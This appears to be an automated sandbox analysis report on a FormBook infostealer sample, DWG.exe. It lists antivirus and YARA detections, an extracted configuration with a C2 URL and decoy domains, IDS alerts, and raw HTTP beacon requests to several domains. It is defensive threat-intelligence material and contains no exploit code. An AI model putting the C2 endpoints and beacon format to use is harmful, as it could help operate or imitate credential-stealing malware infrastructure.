Malware Configuration Extractor: FormBook {"C2 list": ["www.elsist.online/xzes/"], "decoy": ["dent-works.com", "theravewizards.com", "venkataramanagraphics.com", "overway.store", "alignatura.com", "boggbogs.com", "senerants.tech", "muintel.net", "bestplacementconsultancy.com", "trippresso.com", "communication.services", "xn--maraaestudio-dhb.com", "beandhira.com", "lochnas.com", "update-mind.com", "cpcacursos.com", "metaverse-coaching.com", "skindefense5.com", "distressedthenblessed.com", "alphaore.com", "extrobility.com", "sandyanmax.com", "jntycy.com", "becomingalice.com", "printyourdays.com", "fallet-official.com", "hcbg.online", "era575.com", "dalainstitute.info", "7looks-mocha-totalbeauty.com", "spydasec.com", "vote4simone.net", "cannabeeswax.com", "coalitionloop.com", "skywalkerpressonline.com", "healthybalancedliving.com", "mylistg.com", "bookbqconspicuous.com", "mylyk.net", "mylindiss.com", "xn--80akukchh.xn--80asehdb", "captekbrasil.com", "joannhydeyoga.com", "monenee.xyz", "nishantmohapatra.com", "mindbodyweightlossmethod.com", "sxjcfw.com", "wilbertluna.com", "inclutel.com", "knowsyourdream.com", "uk-gaming.com", "maihengkeji.online", "fragrant-nest.com", "ubfodessa.com", "vipinindustries.com", "narcozland.com", "heros-coaching.com", "austeregomrqg.xyz", "eleonoritalia.com", "publiccoins.online", "dashmints.com", "thebrandstudiointernational.com", "thaikindee.com", "punkidz.com"]}

Multi AV Scanner detection for submitted file

Show sources

Source: DWG.exe	Virustotal: Detection: 50%			Perma Link
Source: DWG.exe	ReversingLabs: Detection: 37%

Yara detected FormBook

Show sources

Source: Yara match	File source: 5.2.DWG.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.DWG.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.DWG.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.DWG.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.556950950.0000000002F10000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.329088160.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.556210414.0000000000A00000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.378660694.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.378750031.00000000005C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.330081826.00000000007A6000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.556634388.0000000002E10000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.378700564.0000000000430000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.348602608.000000000792F000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.363695053.000000000792F000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.329372667.0000000000401000.00000020.00020000.sdmp, type: MEMORY

Antivirus / Scanner detection for submitted sample

Show sources

Source: DWG.exe

Avira: detected

Machine Learning detection for sample

Show sources

Source: DWG.exe

Joe Sandbox ML: detected

Source: 5.2.DWG.exe.400000.0.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 10.2.svchost.exe.900000.1.unpack	Avira: Label: TR/Patched.Gen
Source: 5.0.DWG.exe.400000.1.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.0.DWG.exe.400000.2.unpack	Avira: Label: TR/Crypt.ZPACK.Gen
Source: 10.2.svchost.exe.3c3796c.4.unpack	Avira: Label: TR/Patched.Gen

Source: DWG.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source:	Binary string: wntdll.pdbUGP source: DWG.exe, 00000005.00000002.379687984.0000000000B6F000.00000040.00000001.sdmp, svchost.exe, 0000000A.00000002.557374731.000000000381F000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: DWG.exe, svchost.exe
Source:	Binary string: svchost.pdb source: DWG.exe, 00000005.00000002.378810891.000000000061A000.00000004.00000020.sdmp
Source:	Binary string: svchost.pdbUGP source: DWG.exe, 00000005.00000002.378810891.000000000061A000.00000004.00000020.sdmp

Source: C:\Users\user\Desktop\DWG.exe	Code function: 0_2_00436310 FindFirstFileA,GetDriveTypeA,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,FindClose,
Source: C:\Users\user\Desktop\DWG.exe	Code function: 0_2_00449B06 GetFullPathNameA,lstrcpynA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrcpyA,

Source: C:\Users\user\Desktop\DWG.exe	Code function: 4x nop then pop edi
Source: C:\Users\user\Desktop\DWG.exe	Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then pop edi
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 4x nop then pop edi

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49819 -> 198.54.116.195:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49819 -> 198.54.116.195:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49819 -> 198.54.116.195:80

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Domain query: www.hcbg.online
Source: C:\Windows\explorer.exe	Domain query: www.knowsyourdream.com
Source: C:\Windows\explorer.exe	Network Connect: 198.187.31.159 80
Source: C:\Windows\explorer.exe	Network Connect: 154.216.113.38 80
Source: C:\Windows\explorer.exe	Domain query: www.jntycy.com
Source: C:\Windows\explorer.exe	Domain query: www.publiccoins.online
Source: C:\Windows\explorer.exe	Domain query: www.theravewizards.com
Source: C:\Windows\explorer.exe	Domain query: www.thebrandstudiointernational.com
Source: C:\Windows\explorer.exe	Network Connect: 198.54.117.215 80
Source: C:\Windows\explorer.exe	Network Connect: 5.157.87.204 80

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: www.elsist.online/xzes/

Source: Joe Sandbox View	ASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
Source: Joe Sandbox View	ASN Name: POWERLINE-AS-APPOWERLINEDATACENTERHK POWERLINE-AS-APPOWERLINEDATACENTERHK

Source: global traffic	HTTP traffic detected: GET /xzes/?MnaP7J=3fjTHZDPJpAt&YTspi8lX=o99pRogLOIyRAntfhtpVZytcMadcCvcEAGz2+SNM9lt1Q6oIsfbH3zhNe5B/+1jhL6CE HTTP/1.1Host: www.jntycy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /xzes/?MnaP7J=3fjTHZDPJpAt&YTspi8lX=VW6AQLcl+2136037Dei1g2cODa3ue2eSFsBods08HsyRy7QSHzNYTvvdstC8PYxoWiaB HTTP/1.1Host: www.publiccoins.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /xzes/?YTspi8lX=hHkh8CC3aQWSbWc+haxkrlzKrETBoK7eA41q+CP6m5nHXq5sq3R+TUUaF/2E5Ug81ukz&MnaP7J=3fjTHZDPJpAt HTTP/1.1Host: www.thebrandstudiointernational.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /xzes/?YTspi8lX=hsby6OIEBt/ghsMVYLSyJdZ7YeDc2IcIgsMuos52TKAPvq+RR5iGDOsuf8zypfzdpc18&MnaP7J=3fjTHZDPJpAt HTTP/1.1Host: www.theravewizards.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View	IP Address: 198.187.31.159 198.187.31.159
Source: Joe Sandbox View	IP Address: 198.54.117.215 198.54.117.215

Source: svchost.exe, 0000000A.00000002.557764792.0000000003DB2000.00000004.00020000.sdmp	String found in binary or memory: http://push.zhanzhang.baidu.com/push.js
Source: explorer.exe, 00000006.00000000.367204188.000000000EEB1000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.mi
Source: svchost.exe, 0000000A.00000002.557764792.0000000003DB2000.00000004.00020000.sdmp	String found in binary or memory: https://www.yourhosting.nl/parkeerpagina.html
Source: svchost.exe, 0000000A.00000002.557764792.0000000003DB2000.00000004.00020000.sdmp	String found in binary or memory: https://zz.bdstatic.com/linksubmit/push.js

Source: unknown

DNS traffic detected: queries for: www.jntycy.com

Source: global traffic	HTTP traffic detected: GET /xzes/?MnaP7J=3fjTHZDPJpAt&YTspi8lX=o99pRogLOIyRAntfhtpVZytcMadcCvcEAGz2+SNM9lt1Q6oIsfbH3zhNe5B/+1jhL6CE HTTP/1.1Host: www.jntycy.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /xzes/?MnaP7J=3fjTHZDPJpAt&YTspi8lX=VW6AQLcl+2136037Dei1g2cODa3ue2eSFsBods08HsyRy7QSHzNYTvvdstC8PYxoWiaB HTTP/1.1Host: www.publiccoins.onlineConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /xzes/?YTspi8lX=hHkh8CC3aQWSbWc+haxkrlzKrETBoK7eA41q+CP6m5nHXq5sq3R+TUUaF/2E5Ug81ukz&MnaP7J=3fjTHZDPJpAt HTTP/1.1Host: www.thebrandstudiointernational.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /xzes/?YTspi8lX=hsby6OIEBt/ghsMVYLSyJdZ7YeDc2IcIgsMuos52TKAPvq+RR5iGDOsuf8zypfzdpc18&MnaP7J=3fjTHZDPJpAt HTTP/1.1Host: www.theravewizards.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: C:\Users\user\Desktop\DWG.exe	Code function: 0_2_00446387 GetKeyState,GetKeyState,GetKeyState,GetKeyState,SendMessageA,
Source: C:\Users\user\Desktop\DWG.exe	Code function: 0_2_00448BC4 GetKeyState,GetKeyState,GetKeyState,GetKeyState,

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 5.2.DWG.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.DWG.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.DWG.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.0.DWG.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.556950950.0000000002F10000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.329088160.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.556210414.0000000000A00000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.378660694.0000000000401000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.378750031.00000000005C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.330081826.00000000007A6000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.556634388.0000000002E10000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.378700564.0000000000430000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.348602608.000000000792F000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.363695053.000000000792F000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000000.329372667.0000000000401000.00000020.00020000.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 5.2.DWG.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.2.DWG.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.DWG.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.DWG.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.DWG.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.DWG.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 5.0.DWG.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 5.0.DWG.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.556950950.0000000002F10000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.556950950.0000000002F10000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.329088160.0000000000401000.00000020.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.329088160.0000000000401000.00000020.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.556210414.0000000000A00000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.556210414.0000000000A00000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.378660694.0000000000401000.00000020.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.378660694.0000000000401000.00000020.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.378750031.00000000005C0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.378750031.00000000005C0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.330081826.00000000007A6000.00000004.00000020.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.330081826.00000000007A6000.00000004.00000020.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000A.00000002.556634388.0000000002E10000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000A.00000002.556634388.0000000002E10000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000002.378700564.0000000000430000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.378700564.0000000000430000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.348602608.000000000792F000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.348602608.000000000792F000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000006.00000000.363695053.000000000792F000.00000040.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000000.363695053.000000000792F000.00000040.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000005.00000000.329372667.0000000000401000.00000020.00020000.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000000.329372667.0000000000401000.00000020.00020000.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Source: DWG.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

Source: 5.2.DWG.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.2.DWG.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.DWG.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.0.DWG.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.DWG.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.0.DWG.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 5.0.DWG.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 5.0.DWG.exe.400000.2.unpack, type: UNPACKEDPE	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.556950950.0000000002F10000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.556950950.0000000002F10000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000000.329088160.0000000000401000.00000020.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000000.329088160.0000000000401000.00000020.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.556210414.0000000000A00000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.556210414.0000000000A00000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.378660694.0000000000401000.00000020.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.378660694.0000000000401000.00000020.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.378750031.00000000005C0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.378750031.00000000005C0000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000000.00000002.330081826.00000000007A6000.00000004.00000020.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000000.00000002.330081826.00000000007A6000.00000004.00000020.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0000000A.00000002.556634388.0000000002E10000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 0000000A.00000002.556634388.0000000002E10000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.378700564.0000000000430000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.378700564.0000000000430000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000000.348602608.000000000792F000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000000.348602608.000000000792F000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000000.363695053.000000000792F000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000000.363695053.000000000792F000.00000040.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000000.329372667.0000000000401000.00000020.00020000.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000000.329372667.0000000000401000.00000020.00020000.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research

Source: C:\Users\user\Desktop\DWG.exe	Code function: 0_2_00457B08
Source: C:\Users\user\Desktop\DWG.exe	Code function: 0_2_00424075
Source: C:\Users\user\Desktop\DWG.exe	Code function: 0_2_00423006
Source: C:\Users\user\Desktop\DWG.exe	Code function: 0_2_00423204
Source: C:\Users\user\Desktop\DWG.exe	Code function: 0_2_00425326
Source: C:\Users\user\Desktop\DWG.exe	Code function: 0_2_004234B8
Source: C:\Users\user\Desktop\DWG.exe	Code function: 0_2_00443530
Source: C:\Users\user\Desktop\DWG.exe	Code function: 0_2_00445718
Source: C:\Users\user\Desktop\DWG.exe	Code function: 0_2_004238CF
Source: C:\Users\user\Desktop\DWG.exe	Code function: 0_2_00439891
Source: C:\Users\user\Desktop\DWG.exe	Code function: 0_2_004249F1
Source: C:\Users\user\Desktop\DWG.exe	Code function: 0_2_00423A87
Source: C:\Users\user\Desktop\DWG.exe	Code function: 0_2_00423C50
Source: C:\Users\user\Desktop\DWG.exe	Code function: 0_2_0043ED67
Source: C:\Users\user\Desktop\DWG.exe	Code function: 0_2_00425D9C
Source: C:\Users\user\Desktop\DWG.exe	Code function: 0_2_00421E34
Source: C:\Users\user\Desktop\DWG.exe	Code function: 0_2_00426F68
Source: C:\Users\user\Desktop\DWG.exe	Code function: 0_2_00427F39
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00401030
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_0041C9C9
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_0041C98E
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_0041BA57
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00401208
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00408C80
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00402D90
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_0041CFA3
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00402FB0
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00AA20A0
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00B420A8
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A8B090
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00B428EC
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00B4E824
Source: C:\Users\user\Desktop\DWG.exe	Code function: 5_2_00A9A830
